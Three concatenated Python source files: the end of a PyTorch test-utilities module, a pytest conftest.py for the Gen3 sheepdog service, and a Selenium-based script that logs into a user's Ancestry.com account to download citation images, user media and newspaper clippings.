if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
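# Worked example (illustrative; assumes a little-endian host, which is what the
# native-order ctypes reinterpretation above effectively relies on):
#   bytes_to_scalar([1, 0, 0, 0], torch.int32, 'cpu')       -> tensor(1, dtype=torch.int32)
#   bytes_to_scalar([0, 0, 128, 63], torch.float32, 'cpu')  -> tensor(1., dtype=torch.float32)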
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
    # This is to avoid system disturbances that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
T = TypeVar('T')
def first_sample(self: unittest.TestCase, samples: Iterable[T]) -> T:
"""
Returns the first sample from an iterable of samples, like those returned by OpInfo.
The test will be skipped if no samples are available.
"""
try:
return next(iter(samples))
except StopIteration:
raise unittest.SkipTest('Skipped! Need at least 1 sample input')
|
conftest.py
|
import os
import json
import importlib
from multiprocessing import Process
from indexd import default_settings, get_app as get_indexd_app
from indexclient.client import IndexClient
import pytest
import requests
import requests_mock
from mock import patch
from psqlgraph import PsqlGraphDriver
from dictionaryutils import DataDictionary, dictionary
from datamodelutils import models, validators
from gen3authz.client.arborist.client import ArboristClient
from sheepdog.test_settings import INDEX_CLIENT
from tests.integration.datadictwithobjid.api import app as _app, app_init, indexd_init
from tests.integration.datadictwithobjid.submission.test_endpoints import put_cgci_blgsp
from tests import utils
def get_parent(path):
print(path)
return path[0 : path.rfind("/")]
PATH_TO_SCHEMA_DIR = (
get_parent(os.path.abspath(os.path.join(os.path.realpath(__file__), os.pardir)))
+ "/datadictwithobjid/schemas"
)
# update these settings if you want to point to another db
def pg_config(use_ssl=False, isolation_level=None):
test_host = (
"localhost:" + str(os.environ.get("PGPORT"))
if os.environ.get("PGPORT") is not None
else "localhost"
)
test_user = "test"
test_pass = "test" # nosec
test_db = "sheepdog_automated_test"
ret_val = dict(host=test_host, user=test_user, password=test_pass, database=test_db)
# set sslmode if it's given, otherwise use the default
if use_ssl:
connect_args = {}
connect_args["sslmode"] = "require"
ret_val["connect_args"] = connect_args
# set isolation_level if it's given, otherwise use the default
if isolation_level:
ret_val["isolation_level"] = isolation_level
return ret_val
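# Illustrative sketch of what pg_config() above returns (the port is hypothetical
# and depends on the PGPORT environment variable):
#   pg_config(use_ssl=True, isolation_level="REPEATABLE_READ") ->
#   {"host": "localhost:5432", "user": "test", "password": "test",
#    "database": "sheepdog_automated_test",
#    "connect_args": {"sslmode": "require"},
#    "isolation_level": "REPEATABLE_READ"}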
@pytest.fixture
def require_index_exists_on(app, monkeypatch):
monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", True)
@pytest.fixture
def require_index_exists_off(app, monkeypatch):
monkeypatch.setitem(app.config, "REQUIRE_FILE_INDEX_EXISTS", False)
def wait_for_indexd_alive(port):
url = "http://localhost:{}/_status".format(port)
try:
requests.get(url)
except requests.ConnectionError:
return wait_for_indexd_alive(port)
else:
return
def wait_for_indexd_not_alive(port):
url = "http://localhost:{}/_status".format(port)
try:
requests.get(url)
except requests.ConnectionError:
return
else:
return wait_for_indexd_not_alive(port)
@pytest.fixture
def app(tmpdir, request):
port = 8000
dictionary_setup(_app)
# this is to make sure sqlite is initialized
# for every unit test
importlib.reload(default_settings)
# fresh files before running
for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
if os.path.exists(filename):
os.remove(filename)
indexd_app = get_indexd_app()
indexd_init(*INDEX_CLIENT["auth"])
indexd = Process(target=indexd_app.run, args=["localhost", port])
indexd.start()
wait_for_indexd_alive(port)
gencode_json = tmpdir.mkdir("slicing").join("test_gencode.json")
gencode_json.write(
json.dumps(
{
"a_gene": ["chr1", None, 200],
"b_gene": ["chr1", 150, 300],
"c_gene": ["chr1", 200, None],
"d_gene": ["chr1", None, None],
}
)
)
def teardown():
for filename in ["auth.sq3", "index.sq3", "alias.sq3"]:
if os.path.exists(filename):
os.remove(filename)
indexd.terminate()
wait_for_indexd_not_alive(port)
_app.config.from_object("sheepdog.test_settings")
_app.config["PATH_TO_SCHEMA_DIR"] = PATH_TO_SCHEMA_DIR
request.addfinalizer(teardown)
app_init(_app)
_app.logger.setLevel(os.environ.get("GDC_LOG_LEVEL", "WARNING"))
_app.jwt_public_keys = {
_app.config["USER_API"]: {
"key-test": utils.read_file(
"./integration/resources/keys/test_public_key.pem"
)
}
}
_app.auth = ArboristClient()
return _app
@pytest.fixture(params=[None, False, True])
def use_ssl(request):
# return None, False, True
return request.param
@pytest.fixture(params=("READ_COMMITTED", "REPEATABLE_READ", "SERIALIZABLE", None))
def isolation_level(request):
# return 'READ_COMMITTED', 'REPEATABLE_READ', 'SERIALIZABLE', None
return request.param
@pytest.fixture
def pg_driver(request, client, use_ssl, isolation_level):
pg_driver = PsqlGraphDriver(
**pg_config(use_ssl=use_ssl, isolation_level=isolation_level)
)
def tearDown():
with pg_driver.engine.begin() as conn:
for table in models.Node().get_subclass_table_names():
if table != models.Node.__tablename__:
conn.execute("delete from {}".format(table)) # nosec
for table in models.Edge().get_subclass_table_names():
if table != models.Edge.__tablename__:
conn.execute("delete from {}".format(table)) # nosec
conn.execute("delete from versioned_nodes")
conn.execute("delete from _voided_nodes")
conn.execute("delete from _voided_edges")
conn.execute("delete from transaction_snapshots")
conn.execute("delete from transaction_documents")
conn.execute("delete from transaction_logs")
tearDown()
request.addfinalizer(tearDown)
return pg_driver
@pytest.fixture()
def cgci_blgsp(client, submitter):
put_cgci_blgsp(client, submitter)
@pytest.fixture()
def index_client():
return IndexClient(
INDEX_CLIENT["host"], INDEX_CLIENT["version"], INDEX_CLIENT["auth"]
)
def dictionary_setup(_app):
url = "s3://testurl"
session = requests.Session()
adapter = requests_mock.Adapter()
session.mount("s3", adapter)
json_dict = json.load(open(PATH_TO_SCHEMA_DIR + "/dictionary.json"))
adapter.register_uri("GET", url, json=json_dict, status_code=200)
resp = session.get(url)
with patch("requests.get") as get_mocked:
get_mocked.return_value = resp
datadictionary = DataDictionary(url=url)
dictionary.init(datadictionary)
from gdcdatamodel import models as md
from gdcdatamodel import validators as vd
models.init(md)
validators.init(vd)
|
ancestry_extract.py
|
#!/usr/bin/env python3
"""
##############################################################################
# Copyright 2019-2020 Christopher Horn
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""
import argparse
import atexit
import filecmp
import hashlib
import json
import logging
import os
import sys
import time
from multiprocessing import Process, Queue
from signal import SIGABRT, SIGTERM, signal
import filetype
import pathvalidate
import pendulum
import requests
import toml
from bs4 import BeautifulSoup
from selenium.common.exceptions import WebDriverException
from selenium.webdriver import Firefox, FirefoxProfile
from selenium.webdriver.firefox.options import Options
_SIGNAL_EXIT = False
def clean_exit():
"""
Exits cleanly
"""
global _SIGNAL_EXIT
_SIGNAL_EXIT = True
sys.exit(0)
def session_cleanup(session):
"""
Perform clean session shutdown saving current state
"""
logging.info("Starting application shutdown")
try:
state = {
"checkpoint": session.checkpoint,
"tree_id": session.tree_id,
"tree_name": session.tree_name,
"unavailable": session.unavailable,
}
with open(session.options.output + "/metadata/state.toml", "w") as state_file:
state_file.write(toml.dumps(state))
state_file.flush()
except:
pass
logging.info("Cleaning up session and closing browser if active")
logging.getLogger().setLevel(logging.CRITICAL)
if _SIGNAL_EXIT:
try:
session.save_screenshot("ancestryAbortImage.png")
except:
logging.critical("Failed to save abort screen shot")
try:
session.quit()
except:
pass
logging.getLogger().setLevel(logging.INFO)
def load_tables(queue, path):
"""
Load image hash and identifier caches
"""
checkpoint = 0
unavailable = []
tree_id = tree_name = ""
hash_map = {}
logging.info("Checking for hashes to seed image hash cache")
for dir_name in ["apid", "guid"]:
for fs_entry in os.scandir("{0}/metadata/{1}".format(path, dir_name)):
if fs_entry.is_file() and ".toml" in fs_entry.name:
with open(fs_entry.path, "r") as meta_file:
metadata = toml.load(meta_file)
if "hash" in metadata and "image" in metadata:
hash_map.update({metadata["hash"]: metadata["image"]})
if "clip_hash" in metadata and "clipping" in metadata:
hash_map.update({metadata["clip_hash"]: metadata["clipping"]})
state_file = "{0}/metadata/state.toml".format(path)
if os.path.isfile(state_file):
with open(state_file, "r") as meta_file:
metadata = toml.load(meta_file)
if "checkpoint" in metadata:
checkpoint = metadata["checkpoint"]
if "tree_id" in metadata:
tree_id = metadata["tree_id"]
if "tree_name" in metadata:
tree_name = metadata["tree_name"]
if "unavailable" in metadata:
unavailable = metadata["unavailable"]
if hash_map != {}:
logging.info("Loaded %d image hashes", len(hash_map))
else:
logging.info("No hashes found to preseed cache")
image_cache = {}
logging.info("Checking for images to seed image identifier cache")
for fs_object in os.scandir("{0}/media/dbid".format(path)):
if fs_object.is_dir():
for fs_entry in os.scandir(fs_object.path):
if fs_entry.is_file():
dbid = fs_object.name
extension = fs_entry.name.split(".").pop(-1)
iid = fs_entry.name.replace("." + extension, "")
image_cache.update({"{0}_{1}".format(dbid, iid): fs_entry.path})
    if image_cache != {}:
logging.info("Loaded %d image identifiers", len(image_cache))
else:
logging.info("No images found to preseed cache")
result = {
"checkpoint": checkpoint,
"tree_id": tree_id,
"tree_name": tree_name,
"unavailable": unavailable,
"hash_map": hash_map,
"image_cache": image_cache,
}
queue.put(result)
def load_gedcom(queue, gedcom_data):
"""
First pass load for gedcom data
"""
people = {}
person = ""
families = 0
apids = []
guids = []
apid_total = guid_total = 0
logging.info("Performing first pass Gedcom analysis")
for line in gedcom_data.split("\n"):
if len(line) < 6:
continue
tag = line.split(" ")[1]
if "@P" in tag:
person = tag
continue
if tag == "NAME" and person != "":
people.update({person: line[7:]})
continue
if "@F" in tag:
families = families + 1
continue
if tag == "_APID":
apid_total = apid_total + 1
apid = line.split(" ")[2]
if apid not in apids:
apids.append(apid)
continue
if tag == "FILE" and "http" in line:
guid_total = guid_total + 1
url = line.split(" ").pop(2).strip()
guid = url.split("&").pop(1)[5:]
if guid not in guids:
guids.append(guid)
result = {
"people": people,
"families": families,
"apid_total": apid_total,
"apid_unique": len(apids),
"guid_total": guid_total,
"guid_unique": len(guids),
}
queue.put(result)
def wait_for_text(session, text, timeout):
"""
Poll until expected text appears in an asynchronously loading page
"""
count = 0
limit = timeout / 0.2
test_text = text.split("|")
while True:
if session.page_source is None:
return "unavailable"
# Any one of the "|" separated candidate strings counts as the page being ready
for candidate in test_text:
if candidate in session.page_source:
return "ready"
if "this page is temporarily unavailable" in session.page_source:
return "unavailable"
if count > limit:
logging.error("Timeout waiting for object visibility")
return "timeout"
count = count + 1
time.sleep(0.2)
def login(session):
"""
Handle initial login process
"""
page = "{0}/secure/Login".format(session.options.ancestry)
logging.info("Loading page " + page)
try:
session.get(page)
except Exception:
logging.error("Problem loading initial Ancestry.com login page")
session.save_screenshot("ancestryFailedConnectImage.png")
sys.exit(1)
if 'id="signInCustLink"' in session.page_source:
logging.info("Found sign in screen, clicking link to sign in")
sign_in = session.find_element_by_id("signInCustLink")
sign_in.click()
session.switch_to.default_content()
result = wait_for_text(session, 'id="usernameLabel"', 10)
if result != "ready":
logging.error("Login page did not come up after clicking sign in")
session.save_screenshot("ancestryFailedSignInClick.png")
sys.exit(1)
if 'id="signInFrame"' in session.page_source:
iframe = session.find_element_by_id("signInFrame")
session.switch_to.frame(iframe)
if 'id="usernameLabel"' in session.page_source:
logging.info("Attempting login as %s", session.options.account)
submit_id = "signInBtn"
user_id = "username"
pass_id = "password"
if 'id="usernameHOM"' in session.page_source:
submit_id = "signinHOM"
user_id = "usernameHOM"
pass_id = "passwordHOM"
if submit_id not in session.page_source:
logging.error("Can not find submit button to login")
session.save_screenshot("ancestryMissingLoginSubmit.png")
sys.exit(1)
account_field = session.find_element_by_id(user_id)
account_field.clear()
account_field.send_keys(session.options.account)
password_field = session.find_element_by_id(pass_id)
password_field.clear()
password_field.send_keys(session.options.password)
submit_button = session.find_element_by_id(submit_id)
submit_button.click()
session.switch_to.default_content()
count = 0
logged_in = False
while count < 100:
try:
if "About this tree" in session.page_source:
logged_in = True
break
if "Products and Services" in session.page_source:
logged_in = True
break
if "Invalid credentials" in session.page_source:
logging.error("Login failed, invalid credentials supplied")
session.save_screenshot("ancestryFailedLoginImage.png")
sys.exit(1)
except Exception:
pass
count = count + 1
time.sleep(0.2)
if not logged_in:
logging.error("Login failed, home page did not appear to load")
session.save_screenshot("ancestryFailedLoginImage.png")
sys.exit(1)
logging.info("Successfully logged in")
def compare_files(file1, file2):
"""
Compare two files; kept as a separate function so different comparison methods can be used per file type
"""
if file1[-3:] == "pdf" or file2[-3:] == "pdf":
# PDF hashes change in unpredictable ways.
# There are some tools that convert pdfs to images and then compare them
# but they add a lot of overhead and could be more difficult to set up.
# This works well enough for now: treat the PDFs as identical
# if their file sizes are within a few bytes of each other.
return abs(int(os.stat(file1).st_size) - int(os.stat(file2).st_size)) < 8
else:
return filecmp.cmp(file1, file2)
def get_image(session, url, target_name):
"""
Download an image and check whether it duplicates one already saved
"""
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 "
+ "(KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
target_name = pathvalidate.sanitize_filepath(target_name)
download_name = "{0}/download.data".format(os.path.dirname(target_name))
if os.path.isfile(download_name):
logging.debug("Found and removing old %s", download_name)
os.remove(download_name)
logging.info("Downloading image at %s", url)
download_session = requests.session()
download_session.headers.update(headers)
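# Copy the authenticated browser cookies into the requests session so the
# download happens as the logged-in user.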
for cookie in session.get_cookies():
download_session.cookies.update({cookie["name"]: cookie["value"]})
try:
file_data = download_session.get(url, allow_redirects=True)
logging.debug(download_name)
path, filename = os.path.split(download_name)
os.makedirs(path, exist_ok=True)
with open(download_name, "wb") as image_file:
image_file.write(file_data.content)
except Exception:
logging.error("Error downloading file, retrying")
time.sleep(1)
file_data = download_session.get(url, allow_redirects=True)
with open(download_name, "wb") as image_file:
image_file.write(file_data.content)
file_type = filetype.guess(file_data.content)
if not file_type:
if b"this page is lost or can" in file_data.content:
logging.error(
"Newspapers.com Intermittent Failure, Flagged as unavailable: {}".format(
url
)
)
else:
logging.error("No file returned. Flagged as unavailable: {}".format(url))
return None, None, False
hash_data = hashlib.sha256()
hash_data.update(file_data.content)
file_hash = hash_data.hexdigest()
del hash_data
del file_data
del download_session
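# If this hash has been seen before, confirm the files really are identical
# (byte-for-byte, or size-based for PDFs) and reuse the existing file rather
# than keeping a duplicate copy.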
if file_hash in session.hash_map:
if os.path.isfile(session.hash_map[file_hash]):
if compare_files(download_name, session.hash_map[file_hash]):
logging.info(
"Downloaded image identical to %s", session.hash_map[file_hash]
)
os.remove(download_name)
return session.hash_map[file_hash], file_hash, True
logging.critical(
"Downloaded image hash identical to %s", session.hash_map[file_hash]
)
logging.critical(
"A binary file compare differs! You should play the lottery!"
)
logging.critical("Processing aborted as no clue what to do...")
sys.exit(1)
loop = 1
file_name = "{0}.{1}".format(target_name, file_type.extension)
while os.path.isfile(file_name):
logging.debug("Found existing %s", file_name)
if compare_files(download_name, file_name):
logging.info("Downloaded image identical to %s", file_name)
os.remove(download_name)
return file_name, file_hash, False
file_name = "{0}-{1}.{2}".format(target_name, loop, file_type.extension)
loop = loop + 1
os.replace(download_name, file_name)
logging.info("Resulting image named %s", os.path.basename(file_name))
session.hash_map.update({file_hash: file_name})
return file_name, file_hash, False
def get_screenshot(session, target_name):
"""
Take element screenshot
"""
# Some names from Ancestry can include characters that don't play well with the file system
target_name = pathvalidate.sanitize_filepath(target_name)
if os.path.isfile(target_name):
logging.info("Found existing screenshot of the source citation page")
return target_name
logging.info("Taking screenshot of the source citation page")
element = session.find_element_by_class_name("article.ancCol.w66")
element.screenshot(target_name)
return target_name
def get_citation_media(session, line):
"""
Process a source citation page identified by an _APID record
"""
apid = line.split(" ").pop(2).strip()
indiv = apid.split(",").pop(0)
dbid = apid.split(",").pop(1).split(":").pop(0)
dbrecord = apid.split(":").pop(2)
apid_meta_file = "{0}/metadata/apid/apid_{1}_{2}_{3}.toml".format(
session.options.output, indiv, dbid, dbrecord
)
if os.path.isfile(apid_meta_file):
process_data = False
try:
with open(apid_meta_file, "r") as meta_file:
metadata = toml.load(meta_file)
if "image" in metadata:
if not os.path.isfile(metadata["image"]):
process_data = True
if session.options.screenshots and metadata["type"] != "rawimage":
if "screenshot" not in metadata:
process_data = True
elif not os.path.isfile(metadata["screenshot"]):
process_data = True
except Exception:
process_data = True
if not process_data:
if session.line_number > session.checkpoint:
logging.debug("APID %s record already processed", apid)
return "duplicate"
logging.info(
"APID %s previously processed but image missing so reprocessing", apid
)
if apid in session.unavailable:
if session.line_number > session.checkpoint:
logging.debug("APID %s record duplicate of an unavailable one", apid)
return "skip"
logging.info("Processing APID %s", apid)
item_start_time = pendulum.now()
dbid_data = {"dbid": dbid}
apid_data = {"apid": apid}
apid_data.update(
{
"url": "https://search.ancestry.com/cgi-bin/sse.dll?indiv={0}&dbid={1}&h={2}".format(
indiv, dbid, dbrecord
)
}
)
logging.info("Fetching source citation page at %s", apid_data["url"])
session.get(apid_data["url"])
if session.current_url != apid_data["url"]:
source_type = "rawimage"
else:
result = wait_for_text(session, "personRecordSavedToText", 10)
if result != "ready":
logging.warning(
"Source citation page for APID %s unavailable or timed out", apid
)
if result == "unavailable":
session.unavailable = session.unavailable + [apid]
return result
if 'id="viewOriginal"' in session.page_source:
source_type = "image"
elif "Go to website" in session.page_source:
source_type = "url"
else:
source_type = "text"
logging.info("Source citation appears to be %s related", source_type)
apid_data.update({"type": source_type})
logging.info("Extracting cited facts and source information")
soup = BeautifulSoup(session.page_source, features="lxml")
title_section = soup.find(id="recordIndexPageTitle")
if title_section is None:
title_section = soup.find(class_="collectionTitle")
if title_section is not None:
page_title = title_section.text.replace("\n\nfor", "").strip()
subtitle_section = soup.find(class_="pageIntro")
if subtitle_section is not None:
subtitle_entry = subtitle_section.find("a")
if subtitle_entry is not None:
db_title = subtitle_entry.text.strip()
dbid_data.update({"title": db_title})
apid_data.update(
{"title": "{0} in the {1}".format(page_title, db_title)}
)
else:
subtitle_section = None
if subtitle_section is None:
dbid_data.update({"title": page_title})
apid_data.update({"title": page_title})
person_section = soup.find(class_="personRecordSavedToText")
if person_section is not None:
person_entry = person_section.find("a")
if person_entry is not None:
apid_data.update(
{"person_name": person_entry.text, "person_url": person_entry["href"]}
)
session.tree_id = person_entry["href"].split("tid=").pop(1)
tree_record = soup.find(class_="tree_recordSavedTo")
if tree_record is not None:
session.tree_name = tree_record.text.strip('"')
record_section = soup.find(id="recordData")
if record_section is not None:
facts = {}
for row in record_section.find_all("tr"):
table_th = row.find("th", string=True)
if table_th is not None:
key = table_th.string.strip(" :\n")
table_td = row.find("td", string=True)
if table_td is not None:
value = table_td.text.replace("\u00a0", " ").strip(" \n")
if (
"#viewNeighbors" in value
or "#mapWrapper" in value
or "Search for" in value
):
continue
value = (
value.replace("\n\n", "; ").replace(" ;", " ").replace("\n", " ")
)
while " " in value:
value = value.replace(" ", " ")
value = value.replace("Name Age; ", "")
if key.lower() == "url":
value = table_td.find(class_="link")["href"]
facts.update({key: value})
if facts != {}:
apid_data.update({"facts": facts})
citation_section = soup.find(id="sourceCitation")
if citation_section is not None:
for citation in citation_section.find_all(class_="citationCon"):
section_title = citation.find(class_="citationTitle")
if section_title is not None:
section_title = section_title.text.strip(" ").lower().replace(" ", "_")
section_text = citation.find(class_="sourceText")
if section_text is not None:
data = section_text.text.strip(" \n").replace(" Learn more...", "")
data = (
data.replace(".\n ", "; ")
.replace("\u2019", "'")
.replace("\n", " ")
)
while " " in data:
data = data.replace(" ", " ")
if section_title == "source_information":
dbid_data.update(
{
"publisher": data.split("Original data:")
.pop(0)
.strip(" ;,")
}
)
if "Original data:" in data:
dbid_data.update(
{
"original": data.split("Original data:")
.pop(1)
.strip(" ;,")
}
)
elif section_title == "description":
dbid_data.update({"description": data})
elif section_title == "source_citation":
apid_data.update({"citation": data})
if session.options.screenshots and source_type != "rawimage":
screenshot_file = "{0}/media/apid/apid_{1}_{2}_{3}.png".format(
session.options.output, indiv, dbid, dbrecord
)
get_screenshot(session, screenshot_file)
apid_data.update({"screenshot": screenshot_file})
if source_type in ["image", "rawimage"]:
file_name = file_hash = ""
if source_type == "image":
image_link = soup.find(class_="photo", href=True)["href"]
else:
image_link = session.current_url
logging.debug("Image link: %s", image_link)
if "ancestry.com/imageviewer" in image_link:
image_id = image_link.split("?").pop(0).split("/").pop(-1)
unique_id = dbid + "_" + image_id
if unique_id in session.images:
logging.info("Image already downloaded")
for file_hash in session.hash_map:
if image_id in session.hash_map[file_hash]:
file_name = session.hash_map[file_hash]
break
if file_name == "":
file_name = session.images[unique_id]
hash_data = hashlib.sha256()
with open(file_name, "rb") as image_file:
file_data = image_file.read()
hash_data.update(file_data)
file_hash = hash_data.hexdigest()
session.hash_map.update({file_hash: file_name})
else:
logging.info("Getting image meta data")
image_dir = "{0}/media/dbid/{1}".format(session.options.output, dbid)
if not os.path.isdir(image_dir):
os.makedirs(image_dir)
image_file = "{0}/{1}".format(image_dir, image_id)
image_meta_link = (
"https://www.ancestry.com/imageviewer/api/media/token?"
+ "dbId={0}&imageId={1}".format(dbid, image_id)
)
logging.debug("Image metadata link: %s", image_meta_link)
session.get(image_meta_link)
result = wait_for_text(session, "imageDownloadUrl", 10)
if result != "ready":
logging.error("Page unavailable or timeout loading image metadata")
return result
download_url = ""
try:
soup = BeautifulSoup(session.page_source, features="lxml")
image_meta_data = json.loads(soup.find(id="json").string)
download_url = image_meta_data["imageDownloadUrl"]
except Exception:
logging.debug(session.page_source)
if download_url in [None, ""]:
logging.error("Unable to find image download URL")
return "timeout"
logging.debug("Image download url: %s", download_url)
file_name, file_hash, duplicate = get_image(
session, download_url, image_file
)
if file_name:
session.images.update({unique_id: file_name})
if file_name != "":
apid_data.update({"image": file_name, "hash": file_hash})
with open(apid_meta_file, "w") as meta_file:
meta_file.write(toml.dumps(apid_data))
meta_file.flush()
dbid_meta_file = "{0}/metadata/dbid/{1}.toml".format(session.options.output, dbid)
if not os.path.isfile(dbid_meta_file):
if "publisher" not in dbid_data:
db_page = "https://www.ancestry.com/search/collections/{0}".format(dbid)
logging.info("Fetching database search page at %s", db_page)
session.get("https://www.ancestry.com/search/collections/{0}".format(dbid))
result = wait_for_text(session, "sourceInformation", 10)
if result == "ready":
logging.info("Checking for database publisher information")
soup = BeautifulSoup(session.page_source, features="lxml")
source_information = soup.find(id="sourceInformation")
data = source_information.find(class_="conBody")
data = data.text.strip(" \n").replace(" Learn more...", "")
data = (
data.replace(".\n ", "; ").replace("\u2019", "'").replace("\n", " ")
)
while " " in data:
data = data.replace(" ", " ")
dbid_data.update(
{"publisher": data.split("Original data:").pop(0).strip(" ;,")}
)
if "Original data:" in data:
dbid_data.update(
{"original": data.split("Original data:").pop(1).strip(" ;,")}
)
with open(dbid_meta_file, "w") as meta_file:
meta_file.write(toml.dumps(dbid_data))
meta_file.flush()
item_process_time = pendulum.now() - item_start_time
logging.info("Item processing time %d seconds", item_process_time.seconds)
return "success"
def get_newspaper_clipping(session, url):
"""
Download newspapers.com clippings as pdfs with source info
(the default images of these clippings are low quality but anyone can download higher quality clippings without a login)
Download format
https://www.newspapers.com/clippings/download/?id=55922467
Note format from GEDCOM (This is what the script looks for)
https://www.newspapers.com/clip/55922467/shareholders-meeting/
"""
if not session.options.newspapers:
return {}
cid = url.split("/").pop(4)
base_name = "newspapers_com--{0}--{1}".format(url.split("/").pop(5), cid)
dl_url = "https://www.newspapers.com/clippings/download/?id={}".format(cid)
logging.info(
"Fetching Newspapers.com clipping: {0} at {1}".format(
url.split("/").pop(5), dl_url
)
)
image_dir = "{0}/media/{1}".format(session.options.output, "clippings")
if not os.path.isdir(image_dir):
os.makedirs(image_dir)
image_name = "{0}/{1}".format(image_dir, base_name)
file_name, file_hash, duplicate = get_image(session, dl_url, image_name)
if not duplicate and file_name:
return {"clipping": file_name, "clip_hash": file_hash}
return {}
def check_url_note(url, metadata):
"""
Checks the url note for urls that can be processed for additional files
Initially this is just newspapers.com clippings.
Returns True if the url needs to be processed, False if it doesn't
"""
# The check value and the toml value
check_dict = {"https://www.newspapers.com/clip/": "clipping"}
for check_value in check_dict:
if check_value in url:
if check_dict[check_value] in metadata:
if not os.path.isfile(metadata[check_dict[check_value]]):
return True
else:
continue
else:
return True
return False
def process_url_note(session, url):
"""
Process a url note, download any additional files, and return a dict of updates for the GUID metadata
"""
# Dict maps a simple lookup string to the corresponding handler function
check_dict = {
"https://www.newspapers.com/clip/": {"function": get_newspaper_clipping}
}
result = ""
for check_value in check_dict:
if check_value in url:
# Can only match one of the check_dict options so it returns after the first match
result = check_dict[check_value]["function"](session, url)
if result:
return result
return {}
def get_user_media(session, line, url_note):
"""
Process a user contributed media item uniquely identified by the GUID
"""
url = line.split(" ").pop(2).strip()
guid = url.split("&").pop(1)[5:]
guid_meta_file = "{0}/metadata/guid/{1}.toml".format(session.options.output, guid)
if os.path.isfile(guid_meta_file):
process_data = False
try:
with open(guid_meta_file, "r") as meta_file:
metadata = toml.load(meta_file)
if "image" in metadata:
if not os.path.isfile(metadata["image"]):
process_data = True
if check_url_note(url_note, metadata):
process_data = True
except Exception:
process_data = True
if not process_data:
if session.line_number > session.checkpoint:
logging.debug("GUID indicates user media item already downloaded")
return "duplicate"
logging.info("GUID previously processed but image missing so reprocessing")
if guid in session.unavailable:
if session.line_number > session.checkpoint:
logging.debug(
"GUID indicates user media item duplicate of unavailable item"
)
return "skip"
item_start_time = pendulum.now()
logging.info("Fetching user media item page at %s", url)
session.get(url)
result = wait_for_text(session, "showOriginalLink", 10)
if result != "ready":
if result == "unavailable":
session.unavailable = session.unavailable + [guid]
return result
soup = BeautifulSoup(session.page_source, features="lxml")
image_link = soup.find(id="showOriginalLink")["href"]
logging.info("Extracting metadata for the user media")
edit_object = session.find_element_by_id("editObjectLink")
edit_object.click()
result = wait_for_text(session, "PictureType", 10)
if result != "ready":
logging.error("Page unavailable or timed out loading")
return result
soup = BeautifulSoup(session.page_source, features="lxml")
guid_data = {
"guid": guid,
"url": url,
"type": soup.find(id="PictureType").find(selected="true")["value"],
"title": soup.find(id="MediaName")["value"],
}
facts = {
"description": soup.find(id="Description").text,
"location": soup.find(id="Location")["value"],
"date": soup.find(id="Date")["value"],
}
if guid_data["type"] == "document":
facts.update({"transcription": soup.find(id="DocumentTranscription").text})
if guid_data["type"] == "headstone":
facts.update(
{
"headstone_name": soup.find(id="HeadstoneName")["value"],
"headstone_birth_year": soup.find(id="Text2")["value"],
"headstone_birth_location": soup.find(id="Text3")["value"],
"headstone_death_year": soup.find(id="Text4")["value"],
"headstone_death_location": soup.find(id="Text5")["value"],
"headstone_cemetery_name": soup.find(id="HeadstoneCemeteryName")[
"value"
],
}
)
guid_data.update({"facts": facts})
base_name = guid_data["title"].lower()
if base_name in ["", None]:
base_name = "untitled"
for remove_character in [",", "-", '"', "'", "&", ".", "(", ")", "[", "]"]:
base_name = base_name.replace(remove_character, "")
base_name = base_name.replace(" ", "_")
while "__" in base_name:
base_name = base_name.replace("__", "_")
image_dir = "{0}/media/{1}".format(session.options.output, guid_data["type"])
if not os.path.isdir(image_dir):
os.makedirs(image_dir)
